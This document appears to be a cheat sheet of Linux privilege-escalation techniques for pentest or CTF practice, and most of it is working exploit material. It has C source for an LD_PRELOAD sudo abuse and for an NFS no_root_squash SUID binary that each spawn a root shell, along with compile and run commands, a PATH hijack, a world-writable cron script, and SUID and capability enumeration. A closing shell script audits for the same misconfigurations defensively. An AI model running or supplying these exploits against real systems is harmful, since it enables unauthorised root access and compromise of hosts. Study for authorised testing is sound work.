Linux PrivEsc

Sudo Based Privilege Escalation

The holy bible of Linux Privesc: https://gtfobins.github.io/

Abusing sudo with LD_PRELOAD

You can abuse the LD_PRELOAD sudo permission by writing and compiling the following C code. The steps are:

  1. Check that sudo preserves LD_PRELOAD (the env_keep option in sudoers)

  2. Write a small C file and compile it as a shared object (.so extension)

  3. Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid(), setuid() */

/* Runs when the library is loaded (compiled with -nostartfiles). */
void _init() {
    unsetenv("LD_PRELOAD");   /* avoid re-preloading into the spawned shell */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

Save and compile using:

# Compile
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
# Run
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find

SUID based

find / -type f -perm -04000 -ls 2>/dev/null

Capabilities

getcap -r / 2>/dev/null

Cron Jobs

cat /etc/crontab
chmod 777 vulnfile.sh

Path

# Find writable locations in path
find / -writable 2>/dev/null
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

# Add tmp to path
export PATH=/tmp:$PATH

NFS

# For this example, assume the /tmp share has no_root_squash
# On the target machine
cat /etc/exports

# On the attacker's machine, mount the share that has no_root_squash set.
showmount -e <ip>
mkdir /tmp/nsfpe
mount -o rw <ip>:/tmp /tmp/nsfpe

gcc nfs.c -o nfs -w
chmod +s nfs

# Back on the target machine
cd /tmp
./nfs

nfs.c:

#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setgid(), setuid() */

int main(){
	setgid(0);
	setuid(0);
	system("/bin/bash");
	return 0;
}
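As an added defender-side check (not part of these notes), a POSIX shell script that audits three of the misconfigurations listed above: exports granting no_root_squash, cron targets writable by others, and writable PATH directories. The sample exports file, crontab and scripts are constructed inline so it runs offline; the directory and file names are assumptions.

```shell
#!/bin/sh
# Constructed sample data (not from a real host) so the checks run offline.
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/exports" <<'EOF'
/srv/share 10.0.0.0/24(rw,sync,root_squash)
/tmp       *(rw,sync,no_root_squash)
EOF
printf '#!/bin/sh\necho hi\n' > "$SAMPLE_DIR/vulnfile.sh"
chmod 777 "$SAMPLE_DIR/vulnfile.sh"      # world-writable cron target
printf '#!/bin/sh\necho ok\n' > "$SAMPLE_DIR/safe.sh"
chmod 755 "$SAMPLE_DIR/safe.sh"
cat > "$SAMPLE_DIR/crontab" <<EOF
SHELL=/bin/sh
* * * * * root $SAMPLE_DIR/vulnfile.sh
0 2 * * * root $SAMPLE_DIR/safe.sh
EOF
mkdir "$SAMPLE_DIR/wbin" "$SAMPLE_DIR/bin"
chmod 777 "$SAMPLE_DIR/wbin"             # world-writable PATH entry
chmod 755 "$SAMPLE_DIR/bin"

# Print each export line that grants no_root_squash (exit 0 if any).
exports_no_root_squash() {
    grep 'no_root_squash' "$1"
}

# Print cron commands from a system crontab whose file is writable by others.
# Lines are: min hour dom mon dow user command; env lines and comments skipped.
cron_world_writable() {
    grep -vE '^[[:space:]]*(#|[A-Z_]+=|$)' "$1" | awk '{print $7}' |
    while read -r cmd; do
        if [ -f "$cmd" ] && [ -n "$(find "$cmd" -perm -0002)" ]; then
            echo "$cmd"
        fi
    done
}

# Print each directory in a PATH string that is writable by others.
path_writable_dirs() {
    echo "$1" | tr ':' '\n' | while read -r d; do
        if [ -d "$d" ] && [ -n "$(find "$d" -maxdepth 0 -perm -0002)" ]; then
            echo "$d"
        fi
    done
}

echo "exports:"; exports_no_root_squash "$SAMPLE_DIR/exports"
echo "cron:";    cron_world_writable "$SAMPLE_DIR/crontab"
echo "path:";    path_writable_dirs "$SAMPLE_DIR/wbin:$SAMPLE_DIR/bin"
```

Point the functions at the real /etc/exports, /etc/crontab and $PATH to audit a host; any output is a finding to fix (root_squash, 755 on cron scripts, no writable PATH entries).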
